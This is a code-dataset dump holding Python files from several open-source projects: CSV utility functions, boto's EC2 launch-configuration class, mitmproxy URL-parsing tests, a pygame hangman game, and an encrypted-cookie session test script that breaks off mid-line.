repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
a-e/csvsee | csvsee/utils.py | 1 | 15673 | # utils.py
"""Shared utility functions for the csvsee library.
"""
import csv
import re
import sys
from datetime import datetime, timedelta
from csvsee import dates
class NoMatch (Exception):
"""Exception raised when no column name matches a given expression."""
pass
def float_or_0(value):
"""Try to convert ``value`` to a floating-point number. If
conversion fails, return ``0``.
Examples::
>>> float_or_0(5)
5.0
>>> float_or_0('5')
5.0
>>> float_or_0('five')
0
"""
try:
return float(value)
except ValueError:
return 0
def column_names(csv_file):
"""Return a list of column names in the given ``.csv`` file.
"""
reader = csv.DictReader(open(csv_file, 'r'))
return reader.fieldnames
def strip_prefix(strings):
"""Strip a common prefix from a sequence of strings.
Return ``(prefix, [stripped])`` where ``prefix`` is the string that is
common (with leading and trailing whitespace removed), and ``[stripped]``
is all strings with the prefix removed.
Examples::
>>> strip_prefix(['first', 'fourth', 'fifth'])
('f', ['irst', 'ourth', 'ifth'])
>>> strip_prefix(['spam and eggs', 'spam and potatoes', 'spam and spam'])
('spam and', ['eggs', 'potatoes', 'spam'])
"""
prefix = ''
# Group all first letters, then all second letters, etc.
# letters list will be the same length as the shortest string
for letters in zip(*strings):
# If all letters are the same, append to common prefix
if len(set(letters)) == 1:
prefix += letters[0]
else:
break
# Keep everything after the index where the strings diverge
index = len(prefix)
stripped = [s[index:] for s in strings]
return (prefix.strip(), stripped)
def grep_files(filenames, matches, dateformat='guess', resolution=60,
show_progress=True):
"""Search all the given files for matching text, and return a list of
``(timestamp, counts)`` for each match, where ``timestamp`` is a
``datetime``, and ``counts`` is a dictionary of ``{match: count}``,
counting the number of times each match was found during intervals of
``resolution`` seconds.
"""
# Counts of each match, used as a template for each row
row_temp = [(match, 0) for match in matches]
rows = {}
# Compile regular expressions for matches
# (Shaves off a little bit of execution time)
compiled_matches = [re.compile(expr) for expr in matches]
# Read each line of each file
for filename in filenames:
# Show progress bar?
if show_progress:
num_lines = line_count(filename)
progress = ProgressBar(num_lines, prefix=filename, units='lines')
# No progress bar, just print the filename being read
else:
print("Reading %s" % filename)
# Guess date format?
if not dateformat or dateformat == 'guess':
dateformat = dates.guess_file_date_format(filename)
# HACK: Fake timestamp in case no real timestamps are ever found
timestamp = datetime(1970, 1, 1)
# What line number are we on?
line_num = 0
for line in open(filename, 'r'):
line_num += 1
# Update progress bar every 1000 lines
if show_progress:
if line_num % 1000 == 0 or line_num == num_lines:
progress.update(line_num)
sys.stdout.write('\r' + str(progress))
sys.stdout.flush()
# Remove leading/trailing whitespace and newlines
line = line.strip()
# If line is empty, skip it
if not line:
continue
# See if this line has a timestamp
try:
line_timestamp = dates.date_chop(line, dateformat, resolution)
# No timestamp found, stick with the current one
except dates.CannotParse:
pass
# New timestamp found, switch to it
else:
timestamp = line_timestamp
# If this datestamp hasn't appeared before, add it
if timestamp not in rows:
rows[timestamp] = dict(row_temp)
# Count the number of each match in this line
for expr in compiled_matches:
if expr.search(line):
rows[timestamp][expr.pattern] += 1
# If using progress bar, print a newline
if show_progress:
sys.stdout.write('\n')
# Return a sorted list of (match, {counts}) tuples
return sorted(rows.iteritems())
def top_by(func, count, y_columns, y_values, drop=0):
"""Apply ``func`` to each column, and return the top ``count`` column
names. Arguments:
func
A function that takes a list of values and returns a single value.
`max`, `min`, and average are good examples.
count
How many of the "top" values to keep
y_columns
A list of candidate column names. All of these must
exist as keys in ``y_values``
y_values
Dictionary of ``{column: values}`` for each y-column. Must have
data for each column in ``y_columns`` (any extra column data will
be ignored).
drop
How many top values to skip before returning the next
``count`` top columns
"""
# List of (func(ys), y_name)
results = []
for y_name in y_columns:
f_ys = func(y_values[y_name])
results.append((f_ys, y_name))
# Keep the top ``count`` after dropping ``drop`` values
sorted_columns = [y_name for (f_ys, y_name) in reversed(sorted(results))]
return sorted_columns[drop:drop + count]
def top_by_average(count, y_columns, y_values, drop=0):
"""Determine the top ``count`` columns based on the average of values
in ``y_values``, and return the filtered ``y_columns`` names.
"""
def avg(values):
return float(sum(values)) / len(values)
return top_by(avg, count, y_columns, y_values, drop)
def top_by_peak(count, y_columns, y_values, drop=0):
"""Determine the top ``count`` columns based on the peak value
in ``y_values``, and return the filtered ``y_columns`` names.
"""
return top_by(max, count, y_columns, y_values, drop)
def matching_fields(expr, fields):
"""Return all ``fields`` that match a regular expression ``expr``,
or raise a `NoMatch` exception if no matches are found.
Examples::
>>> matching_fields('a.*', ['apple', 'banana', 'avocado'])
['apple', 'avocado']
>>> matching_fields('a.*', ['peach', 'grape', 'kiwi'])
Traceback (most recent call last):
NoMatch: No matching column found for 'a.*'
"""
# Do backslash-escape of expressions
expr = expr.encode('unicode_escape')
# Find matching fields
matches = [field for field in fields if re.match(expr, field)]
# Return matches or raise a NoMatch exception
if matches:
return matches
else:
raise NoMatch("No matching column found for '%s'" % expr)
def matching_xy_fields(x_expr, y_exprs, fieldnames, verbose=False):
"""Match ``x_expr`` and ``y_exprs`` to all available column names in
``fieldnames``, and return the matched ``x_column`` and ``y_columns``.
Example::
>>> matching_xy_fields('x.*', ['y[12]', 'y[ab]'],
... ['xxx', 'y1', 'y2', 'y3', 'ya', 'yb', 'yc'])
('xxx', ['y1', 'y2', 'ya', 'yb'])
If ``x_expr`` is empty, the first column name is used::
>>> matching_xy_fields('', ['y[12]', 'y[ab]'],
... ['xxx', 'y1', 'y2', 'y3', 'ya', 'yb', 'yc'])
('xxx', ['y1', 'y2', 'ya', 'yb'])
If no match is found for any expression in ``y_exprs``, a `NoMatch`
exception is raised::
>>> matching_xy_fields('', ['y[12]', 'y[jk]'],
... ['xxx', 'y1', 'y2', 'y3', 'ya', 'yb', 'yc'])
Traceback (most recent call last):
NoMatch: No matching column found for 'y[jk]'
"""
# Make a copy of fieldnames
fieldnames = [field for field in fieldnames]
# If x_expr is provided, match on that.
if x_expr:
x_column = matching_fields(x_expr, fieldnames)[0]
# Otherwise, just take the first field.
else:
x_column = fieldnames[0]
#print("X-expression: '%s' matched column '%s'" % (x_expr, x_column))
# In any case, remove the x column from fieldnames so it
# won't be matched by any y-expression.
fieldnames.remove(x_column)
# Get all matching Y columns
y_columns = []
for y_expr in y_exprs:
matches = matching_fields(y_expr, fieldnames)
y_columns.extend(matches)
#print("Y-expression: '%s' matched these columns:" % y_expr)
#print('\n'.join(matches))
return (x_column, y_columns)
def read_xy_values(reader, x_column, y_columns,
date_format='', gmt_offset=0, zero_time=False):
"""Read values from a `csv.DictReader`, and return ``(x_values,
y_values)``. where ``x_values`` is a list of values found in ``x_column``,
and ``y_values`` is a dictionary of ``{y_column: [values]}`` for each
column in ``y_columns``.
Arguments:
x_column
Name of the column you want to use as the X axis.
y_columns
Names of columns you want to plot on the Y axis.
date_format
If given, treat values in ``x_column`` as timestamps
with the given format string.
gmt_offset
Add this many hours to every timestamp.
Only useful with ``date_format``.
zero_time
If ``True``, adjust timestamps so the earliest one starts at
``00:00`` (midnight). Only useful with ``date_format``.
"""
x_values = []
y_values = {}
for row in reader:
x_value = row[x_column]
# If X is supposed to be a date, try to convert it
try:
# FIXME: This could do weird things if the x-values
# are sometimes parseable as dates, and sometimes not
x_value = datetime.strptime(x_value, date_format) + \
timedelta(hours=gmt_offset)
# Otherwise, assume it's a floating-point numeric value
except ValueError:
x_value = float_or_0(x_value)
x_values.append(x_value)
# Append Y values from each column
for y_col in y_columns:
if y_col not in y_values:
y_values[y_col] = []
y_values[y_col].append(float_or_0(row[y_col]))
# Adjust datestamps to start at 0:00?
if date_format and zero_time:
z = min(x_values)
hms = timedelta(hours=z.hour, minutes=z.minute, seconds=z.second)
x_values = [x - hms for x in x_values]
return (x_values, y_values)
def line_count(filename):
"""Return the total number of lines in the given file.
"""
# Not terribly efficient but easy and good enough for now
return sum(1 for line in open(filename))
class ProgressBar:
"""An ASCII command-line progress bar with percentage.
Adapted from Corey Goldberg's version:
http://code.google.com/p/corey-projects/source/browse/trunk/python2/progress_bar.py
"""
def __init__(self, end, prefix='', fill='=', units='secs', width=40):
"""Create a progress bar with the given attributes.
"""
self.end = end
self.prog_bar = '[]'
self.prefix = prefix
self.fill = fill
self.units = units
self.width = width
self._update_amount(0)
def _update_amount(self, new_amount):
"""Update the progress bar with the percentage of completion.
"""
percent_done = int(round((new_amount / 100.0) * 100.0))
all_full = self.width - 2
num_hashes = int(round((percent_done / 100.0) * all_full))
self.prog_bar = '[' + self.fill * num_hashes + ' ' * (all_full - num_hashes) + ']'
pct_place = (len(self.prog_bar) / 2) - len(str(percent_done))
pct_string = '%i%%' % percent_done
self.prog_bar = self.prog_bar[0:pct_place] + \
(pct_string + self.prog_bar[pct_place + len(pct_string):])
def update(self, current):
"""Set the current progress.
"""
self._update_amount((current / float(self.end)) * 100.0)
self.prog_bar += ' %d/%d %s' % (current, self.end, self.units)
def __str__(self):
"""Return the progress bar as a string.
"""
return str(self.prefix + ' ' + self.prog_bar)
def filter_csv(csv_infile, csv_outfile, columns, match='regexp', action='include'):
"""Filter ``csv_infile`` and write output to ``csv_outfile``.
columns
A list of regular expressions or exact column names
match
``regexp`` to treat each value in ``columns`` as a regular
expression, ``exact`` to match exact literal column names
action
``include`` to keep the specified ``columns``, or ``exclude``
to keep all columns *except* the specified ``columns``
"""
# TODO: Factor out a 'filter_columns' function
reader = csv.DictReader(open(csv_infile))
# Do regular-expression matching of column names?
if match == 'regexp':
matching_columns = []
for expr in columns:
# TODO: What if more than one expression matches a column?
# Find a way to avoid duplicates.
matching_columns += matching_fields(expr, reader.fieldnames)
# Exact matching of column names
else:
matching_columns = columns
# Include or exclude?
if action == 'include':
keep_columns = matching_columns
else:
keep_columns = [col for col in reader.fieldnames
if col not in matching_columns]
# Create writer for the columns we're keeping; ignore any extra columns
# passed to the writerow() method.
writer = csv.DictWriter(open(csv_outfile, 'w'), keep_columns,
extrasaction='ignore')
# Write the header (csv.DictWriter doesn't do this for us)
writer.writerow(dict(zip(keep_columns, keep_columns)))
for row in reader:
writer.writerow(row)
def boring_columns(csvfile):
"""Return a list of column names in ``csvfile`` that are "boring"--that is,
the data in them is always the same.
"""
# TODO: Consider columns that never deviate much (less than 1%, say)
# to be boring also
reader = csv.DictReader(open(csvfile))
# Assume all columns are boring until they prove to be interesting
boring = list(reader.fieldnames)
# Remember the first value from each column
prev = reader.next()
for row in reader:
# Check boring columns to see if they have become interesting yet
# (make a copy to prevent problems with popping while iterating)
for col in list(boring):
# If previous value was empty, set prev to current
# (this handles the case where a column is empty for a while,
# then gets a value later). This is not inherently interesting.
if not prev[col].strip():
prev[col] = row[col]
# If the current value is non-empty, and different from the
# previous, then it's interesting
elif row[col].strip() and row[col] != prev[col]:
boring.remove(col)
# Return names of all columns that never became interesting
return boring
| mit | 8,186,793,736,834,113,000 | 33.220524 | 90 | 0.588081 | false |
serviceagility/boto | boto/ec2/autoscale/launchconfig.py | 1 | 10537 | # Copyright (c) 2009 Reza Lotun http://reza.lotun.name/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from boto.ec2.elb.listelement import ListElement
# Namespacing issue with deprecated local class
from boto.ec2.blockdevicemapping import BlockDeviceMapping as BDM
from boto.resultset import ResultSet
import boto.utils
import base64
# this should use the corresponding object from boto.ec2
# Currently in use by deprecated local BlockDeviceMapping class
class Ebs(object):
def __init__(self, connection=None, snapshot_id=None, volume_size=None):
self.connection = connection
self.snapshot_id = snapshot_id
self.volume_size = volume_size
def __repr__(self):
return 'Ebs(%s, %s)' % (self.snapshot_id, self.volume_size)
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'SnapshotId':
self.snapshot_id = value
elif name == 'VolumeSize':
self.volume_size = value
class InstanceMonitoring(object):
def __init__(self, connection=None, enabled='false'):
self.connection = connection
self.enabled = enabled
def __repr__(self):
return 'InstanceMonitoring(%s)' % self.enabled
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'Enabled':
self.enabled = value
# this should use the BlockDeviceMapping from boto.ec2.blockdevicemapping
# Currently in use by deprecated code for backwards compatability
# Removing this class can also remove the Ebs class in this same file
class BlockDeviceMapping(object):
def __init__(self, connection=None, device_name=None, virtual_name=None,
ebs=None, no_device=None):
self.connection = connection
self.device_name = device_name
self.virtual_name = virtual_name
self.ebs = ebs
self.no_device = no_device
def __repr__(self):
return 'BlockDeviceMapping(%s, %s)' % (self.device_name,
self.virtual_name)
def startElement(self, name, attrs, connection):
if name == 'Ebs':
self.ebs = Ebs(self)
return self.ebs
def endElement(self, name, value, connection):
if name == 'DeviceName':
self.device_name = value
elif name == 'VirtualName':
self.virtual_name = value
elif name == 'NoDevice':
self.no_device = bool(value)
class LaunchConfiguration(object):
def __init__(self, connection=None, name=None, image_id=None,
key_name=None, security_groups=None, user_data=None,
instance_type='m1.small', kernel_id=None,
ramdisk_id=None, block_device_mappings=None,
instance_monitoring=False, spot_price=None,
instance_profile_name=None, ebs_optimized=False,
associate_public_ip_address=None, volume_type=None,
delete_on_termination=True, iops=None, use_block_device_types=False):
"""
A launch configuration.
:type name: str
:param name: Name of the launch configuration to create.
:type image_id: str
:param image_id: Unique ID of the Amazon Machine Image (AMI) which was
assigned during registration.
:type key_name: str
:param key_name: The name of the EC2 key pair.
:type security_groups: list
:param security_groups: Names or security group id's of the security
groups with which to associate the EC2 instances or VPC instances,
respectively.
:type user_data: str
:param user_data: The user data available to launched EC2 instances.
:type instance_type: str
:param instance_type: The instance type
:type kernel_id: str
:param kernel_id: Kernel id for instance
:type ramdisk_id: str
:param ramdisk_id: RAM disk id for instance
:type block_device_mappings: list
:param block_device_mappings: Specifies how block devices are exposed
for instances
:type instance_monitoring: bool
:param instance_monitoring: Whether instances in group are launched
with detailed monitoring.
:type spot_price: float
:param spot_price: The spot price you are bidding. Only applies
if you are building an autoscaling group with spot instances.
:type instance_profile_name: string
:param instance_profile_name: The name or the Amazon Resource
Name (ARN) of the instance profile associated with the IAM
role for the instance.
:type ebs_optimized: bool
:param ebs_optimized: Specifies whether the instance is optimized
for EBS I/O (true) or not (false).
:type associate_public_ip_address: bool
:param associate_public_ip_address: Used for Auto Scaling groups that launch instances into an Amazon Virtual Private Cloud.
Specifies whether to assign a public IP address to each instance launched in a Amazon VPC.
:type volume_type: str
:param volume_type: The type of the volume.
Valid values are: standard | io1 | gp2.
:type delete_on_termination: bool
:param delete_on_termination: Whether the device will be deleted
when the instance is terminated.
:type iops: int
:param iops: The provisioned IOPs you want to associate with this volume.
:type use_block_device_types: bool
:param use_block_device_types: Specifies whether to return
described Launch Configs with block device mappings containing.
"""
self.connection = connection
self.name = name
self.instance_type = instance_type
self.block_device_mappings = block_device_mappings
self.key_name = key_name
sec_groups = security_groups or []
self.security_groups = ListElement(sec_groups)
self.image_id = image_id
self.ramdisk_id = ramdisk_id
self.created_time = None
self.kernel_id = kernel_id
self.user_data = user_data
self.created_time = None
self.instance_monitoring = instance_monitoring
self.spot_price = spot_price
self.instance_profile_name = instance_profile_name
self.launch_configuration_arn = None
self.ebs_optimized = ebs_optimized
self.associate_public_ip_address = associate_public_ip_address
self.volume_type = volume_type
self.delete_on_termination = delete_on_termination
self.iops = iops
self.use_block_device_types = use_block_device_types
if connection is not None:
self.use_block_device_types = connection.use_block_device_types
def __repr__(self):
return 'LaunchConfiguration:%s' % self.name
def startElement(self, name, attrs, connection):
if name == 'SecurityGroups':
return self.security_groups
elif name == 'BlockDeviceMappings':
if self.use_block_device_types:
self.block_device_mappings = BDM()
else:
self.block_device_mappings = ResultSet([('member', BlockDeviceMapping)])
return self.block_device_mappings
elif name == 'InstanceMonitoring':
self.instance_monitoring = InstanceMonitoring(self)
return self.instance_monitoring
def endElement(self, name, value, connection):
if name == 'InstanceType':
self.instance_type = value
elif name == 'LaunchConfigurationName':
self.name = value
elif name == 'KeyName':
self.key_name = value
elif name == 'ImageId':
self.image_id = value
elif name == 'CreatedTime':
self.created_time = boto.utils.parse_ts(value)
elif name == 'KernelId':
self.kernel_id = value
elif name == 'RamdiskId':
self.ramdisk_id = value
elif name == 'UserData':
try:
self.user_data = base64.b64decode(value)
except TypeError:
self.user_data = value
elif name == 'LaunchConfigurationARN':
self.launch_configuration_arn = value
elif name == 'InstanceMonitoring':
self.instance_monitoring = value
elif name == 'SpotPrice':
self.spot_price = float(value)
elif name == 'IamInstanceProfile':
self.instance_profile_name = value
elif name == 'EbsOptimized':
self.ebs_optimized = True if value.lower() == 'true' else False
elif name == 'AssociatePublicIpAddress':
self.associate_public_ip_address = True if value.lower() == 'true' else False
elif name == 'VolumeType':
self.volume_type = value
elif name == 'DeleteOnTermination':
if value.lower() == 'true':
self.delete_on_termination = True
else:
self.delete_on_termination = False
elif name == 'Iops':
self.iops = int(value)
else:
setattr(self, name, value)
def delete(self):
""" Delete this launch configuration. """
return self.connection.delete_launch_configuration(self.name)
| mit | 4,851,562,153,878,455,000 | 38.317164 | 132 | 0.63595 | false |
dwfreed/mitmproxy | test/mitmproxy/net/http/test_url.py | 1 | 3187 | import pytest
import sys
from mitmproxy.test import tutils
from mitmproxy.net.http import url
def test_parse():
with tutils.raises(ValueError):
url.parse("")
s, h, po, pa = url.parse(b"http://foo.com:8888/test")
assert s == b"http"
assert h == b"foo.com"
assert po == 8888
assert pa == b"/test"
s, h, po, pa = url.parse("http://foo/bar")
assert s == b"http"
assert h == b"foo"
assert po == 80
assert pa == b"/bar"
s, h, po, pa = url.parse(b"http://user:pass@foo/bar")
assert s == b"http"
assert h == b"foo"
assert po == 80
assert pa == b"/bar"
s, h, po, pa = url.parse(b"http://foo")
assert pa == b"/"
s, h, po, pa = url.parse(b"https://foo")
assert po == 443
with tutils.raises(ValueError):
url.parse(b"https://foo:bar")
# Invalid IDNA
with tutils.raises(ValueError):
url.parse("http://\xfafoo")
# Invalid PATH
with tutils.raises(ValueError):
url.parse("http:/\xc6/localhost:56121")
# Null byte in host
with tutils.raises(ValueError):
url.parse("http://foo\0")
# Invalid IPv6 URL - see http://www.ietf.org/rfc/rfc2732.txt
with tutils.raises(ValueError):
url.parse('http://lo[calhost')
@pytest.mark.skipif(sys.version_info < (3, 6), reason='requires Python 3.6 or higher')
def test_parse_port_range():
# Port out of range
with tutils.raises(ValueError):
url.parse("http://foo:999999")
def test_unparse():
assert url.unparse("http", "foo.com", 99, "") == "http://foo.com:99"
assert url.unparse("http", "foo.com", 80, "/bar") == "http://foo.com/bar"
assert url.unparse("https", "foo.com", 80, "") == "https://foo.com:80"
assert url.unparse("https", "foo.com", 443, "") == "https://foo.com"
surrogates = bytes(range(256)).decode("utf8", "surrogateescape")
surrogates_quoted = (
'%00%01%02%03%04%05%06%07%08%09%0A%0B%0C%0D%0E%0F'
'%10%11%12%13%14%15%16%17%18%19%1A%1B%1C%1D%1E%1F'
'%20%21%22%23%24%25%26%27%28%29%2A%2B%2C-./'
'0123456789%3A%3B%3C%3D%3E%3F'
'%40ABCDEFGHIJKLMNO'
'PQRSTUVWXYZ%5B%5C%5D%5E_'
'%60abcdefghijklmno'
'pqrstuvwxyz%7B%7C%7D%7E%7F'
'%80%81%82%83%84%85%86%87%88%89%8A%8B%8C%8D%8E%8F'
'%90%91%92%93%94%95%96%97%98%99%9A%9B%9C%9D%9E%9F'
'%A0%A1%A2%A3%A4%A5%A6%A7%A8%A9%AA%AB%AC%AD%AE%AF'
'%B0%B1%B2%B3%B4%B5%B6%B7%B8%B9%BA%BB%BC%BD%BE%BF'
'%C0%C1%C2%C3%C4%C5%C6%C7%C8%C9%CA%CB%CC%CD%CE%CF'
'%D0%D1%D2%D3%D4%D5%D6%D7%D8%D9%DA%DB%DC%DD%DE%DF'
'%E0%E1%E2%E3%E4%E5%E6%E7%E8%E9%EA%EB%EC%ED%EE%EF'
'%F0%F1%F2%F3%F4%F5%F6%F7%F8%F9%FA%FB%FC%FD%FE%FF'
)
def test_encode():
assert url.encode([('foo', 'bar')])
assert url.encode([('foo', surrogates)])
def test_decode():
s = "one=two&three=four"
assert len(url.decode(s)) == 2
assert url.decode(surrogates)
def test_quote():
assert url.quote("foo") == "foo"
assert url.quote("foo bar") == "foo%20bar"
assert url.quote(surrogates) == surrogates_quoted
def test_unquote():
assert url.unquote("foo") == "foo"
assert url.unquote("foo%20bar") == "foo bar"
assert url.unquote(surrogates_quoted) == surrogates
| mit | 4,408,111,618,970,608,000 | 28.238532 | 86 | 0.59931 | false |
jobli/24 | hour21_hangman.py | 1 | 3040 | import pygame
import sys
from random import choice
from pygame.locals import *
RED = (255, 0, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
ORANGE = (255, 100, 0)
PURPLE = (100, 0, 255)
def get_words():
f = open("words.txt")
temp = f.readlines()
words = []
for word in temp:
words.append(word.strip())
return words
def draw_gallows(screen):
pygame.draw.rect(screen, PURPLE, (450, 350, 100, 10)) #bottom
pygame.draw.rect(screen, PURPLE, (495, 250, 10, 100)) #support
pygame.draw.rect(screen, PURPLE, (450, 250, 50, 10)) #crossbar
pygame.draw.rect(screen, PURPLE, (450, 250, 10, 25)) #noose
def draw_man(screen, body_part):
if body_part == "head":
pygame.draw.circle(screen, RED, (455, 270), 10) #head
if body_part == "body":
pygame.draw.line(screen, RED, (455, 280), (455, 320), 3) #body
if body_part == "l_arm":
pygame.draw.line(screen, RED, (455, 300), (445, 285), 3) #arm
if body_part == "r_arm":
pygame.draw.line(screen, RED, (455, 300), (465, 285), 3) #arm
if body_part == "l_leg":
pygame.draw.line(screen, RED, (455, 320), (445, 330), 3) #leg
if body_part == "r_leg":
pygame.draw.line(screen, RED, (455, 320), (465, 330), 3) #leg
def draw_word(screen, spaces):
x = 10
for i in range(spaces):
pygame.draw.line(screen, YELLOW, (x, 350), (x+20, 350), 3)
x += 30
def draw_letter(screen, font, word, guess):
x = 10
for letter in word:
if letter == guess:
letter = font.render(letter, 3, (255,255,255))
screen.blit(letter, (x, 300))
x += 30
def main():
pygame.init()
screen = pygame.display.set_mode((600,400))
font = pygame.font.SysFont("monospace", 30)
draw_gallows(screen)
draw_man(screen, body_part="head")
words = get_words()
word = choice(words)
draw_word(screen, len(word))
pygame.display.update()
body = ["r_leg", "l_leg", "r_arm", "l_arm", "body", "head"]
while body:
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
if event.type == KEYDOWN:
if event.unicode.isalpha():
guess = event.unicode
if guess in word:
draw_letter(screen, font, word, guess)
text = font.render("Grattis !", 1, (0, 255, 0))
screen.blit(text, (40, 40))
pygame.display.update()
else:
body_part = body.pop()
draw_man(screen, body_part)
text = font.render("Synd....", 1, (0, 255, 0))
screen.blit(text, (80, 80))
pygame.display.update()
if __name__ == '__main__':
main()
| gpl-3.0 | 4,980,498,610,657,509,000 | 27.679245 | 71 | 0.494737 | false |
PC-fit-Christian-Rupp/Crypt-Cookie | python/saltedSessionIDTest.py | 1 | 6704 | import ccookie
import os
import hashlib
import sys
from time import sleep
import datetime
from Crypto.Cipher import AES
from Crypto.Random import random
from Crypto import Random
from random import SystemRandom
import string
os.environ['SERVER_NAME']='Test Server Name'
os.environ['REMOTE_ADDR']='255.255.255.255'
print('--------------------------------------------------------------------------------')
print('Test with salted Session ID\n')
print('Set enviroment variables!\n')
print('Server name set to "'+ os.environ['SERVER_NAME']+'" for the test routine!')
print('Remote address set to "' +os.environ['REMOTE_ADDR'] +'" for the test routine!\n')
print('Set enviroment variables!\t\t\t\t\t\tFINISHED')
print('-------------------------------------------------------------------------------')
print('Generate test crypt cookie!\n')
oCookie = ccookie.ccookie(complexSessionID = True, salt = 'zero.conf 1970')
print('Generate test crypt cookei!\t\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
print('Test session data!\n')
oCookie.createSession()
print('Session:\t' + oCookie.getSessionID())
print('Domain:\t\t' + oCookie._ccookie__cookie['session']['domain'])
print('Path:\t\t' + oCookie._ccookie__cookie['session']['path'])
print('Expires:\t' + oCookie._ccookie__cookie['session']['expires'])
print('Encrypted IP:\t'+ oCookie._ccookie__cookie[str(oCookie._ccookie__toInt(oCookie._ccookie__encrypt('IP')))].value+'\n')
print('Test session data!\t\t\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
print('Validation and expiration test!\n')
if oCookie.isValid():
print('Validation test!\t\t\t\t\t\t\tFINISHED')
else:
print('Validation test!\t\t\t\t\t\t\tFAILED')
sys.exit(0)
if oCookie.isExpired():
print('Expiration test!\t\t\t\t\t\t\tFAILED')
sys.exit(0)
else:
print('Expiration test!\t\t\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
usr='Mad Max'
pwd='Donnerkupel'
print('Login data test!\n')
print('Testdata:')
print('\tUser name:\t'+usr)
print('\tPassword:\t'+pwd+'\n')
oCookie.login(usr, pwd)
if not(oCookie.getUser()==usr):
print(oCookie.getUser()+' is not the correct user name!\t\t\t\t\tFAILED')
sys.exit(0)
else:
print(oCookie.getUser()+' is the correct user name!\t\t\t\t\tSUCCESS')
if not(oCookie.getPassword()==pwd):
print(oCookie.getPassword()+' is not the correct password!\t\t\t\t\tFAILED')
sys.exit(0)
else:
print(oCookie.getPassword()+' is the correct password!\t\t\t\t\tSUCCESS')
print('Login data test!\t\t\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
print('Check key value funktions!\n')
print('Testdata:')
key = 'Auto'
value = 'Porsche'
print('\tKey:\t'+key)
print('\tValue:\t'+value+'\n')
oCookie.addValue(key, value)
print('Key and value added!\t\t\t\t\t\t\tSUCCESS')
if oCookie.hasKey(key)==1:
print('hasKey!\t\t\t\t\t\t\t\t\tSUCCESS')
else:
print('hasKey!\t\t\t\t\t\t\t\t\tFAILED')
sys.exit(0)
if oCookie.getValue(key)==value:
print(oCookie.getValue(key)+' is the correct value!\t\t\t\t\t\tSUCCESS')
else:
print(oCookie.getValue(key)+' is not the correct value!\t\t\t\t\t\tFAILED')
sys.exit(0)
oCookie.deleteValue(key)
print('Value deleted!\t\t\t\t\t\t\t\tSUCCESS')
print('Check key value functions!\t\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
print('Test crypt cookie with update expiration!\n')
oCookie = ccookie.ccookie(updateExpiration = True)
oCookie.createSession()
strExpiration = oCookie._ccookie__cookie['session']['expires']
sleep(5)
oCookie.login(usr, pwd)
if strExpiration != oCookie._ccookie__cookie['session']['expires']:
print('Update expiration is working!\t\t\t\t\t\tSUCCESS')
else:
print('Update expiration is not working!\t\t\t\t\tFAILED')
sys.exit(0)
print('Test of update expiration!\t\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
print('Test for different expiration times!\n')
oCookie = ccookie.ccookie()
oCookie.createSession()
strExpectedExpiration = (datetime.datetime.utcnow() + datetime.timedelta(minutes=15)).strftime("%a, %d-%b-%Y %H:%M:%S UTC")
if strExpectedExpiration == oCookie._ccookie__cookie['session']['expires']:
print('Default setting with expiration of 15 minutes is working!\t\tSUCCESS')
else:
print('Default setting with expiration of 15 minutes is not working!\t\tFAILED')
sys.exit(0)
oCookie = ccookie.ccookie(timedeltaMinutes = None)
oCookie.createSession()
strExpectedExpiration = (datetime.datetime.utcnow() + datetime.timedelta(days=90)).strftime("%a, %d-%b-%Y %H:%M:%S UTC")
if strExpectedExpiration == oCookie._ccookie__cookie['session']['expires']:
print('Setting with expiration of 3 month is working!\t\t\t\tSUCCESS')
else:
print('Setting with expiration of 3 month is not working!\t\t\tFAILED')
sys.exit(0)
oCookie = ccookie.ccookie(timedeltaMinutes = 60)
oCookie.createSession()
strExpectedExpiration = (datetime.datetime.utcnow() + datetime.timedelta(minutes=60)).strftime("%a, %d-%b-%Y %H:%M:%S UTC")
if strExpectedExpiration == oCookie._ccookie__cookie['session']['expires']:
print('Setting with expiration of 60 minutes is working!\t\t\tSUCCESS')
else:
print('Setting with expiration of 60 minutes is not working!\t\t\tFAILED')
sys.exit(0)
print('Test for different expiration times!\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
print('Test with individual keys!\n')
oInitialVector = Random.new().read(AES.block_size)
oKey = ''.join(SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(32))
oCookie = ccookie.ccookie(AESKey=oKey, AESInitialVector=oInitialVector)
oCookie.createSession()
if oCookie.getKey() == oKey:
print('Individual key correct set!\t\t\t\t\t\tSUCCESS')
else:
print('Individual key not correct set!\t\t\t\t\t\tFAILED')
sys.exit(0)
if oCookie.getInitialVector() == oInitialVector:
